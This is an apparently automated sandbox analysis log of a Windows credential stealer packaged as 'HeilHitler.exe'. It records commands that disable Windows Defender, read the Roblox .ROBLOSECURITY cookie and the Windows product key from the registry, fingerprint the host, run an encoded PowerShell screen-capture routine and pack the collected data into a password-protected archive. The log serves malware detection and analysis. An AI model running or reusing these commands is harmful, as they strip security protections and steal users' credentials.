              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.cmdline"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F (2 identical entries)
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D0C.tmp" "c:\Users\user\AppData\Local\Temp\0qdpbrpq\CSC1A48FA887436480A8B41407A32798B3.TMP"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" *
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C4B340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,68_2_00007FF702C4B340
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D89570 cpuid 0_2_00007FF633D89570
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\_ctypes.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\rarreg.key VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\select.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\VCRUNTIME140.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\_bz2.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\_decimal.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\_lzma.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\_ssl.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\_lzma.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\_bz2.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\_sqlite3.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\select.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\_ssl.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
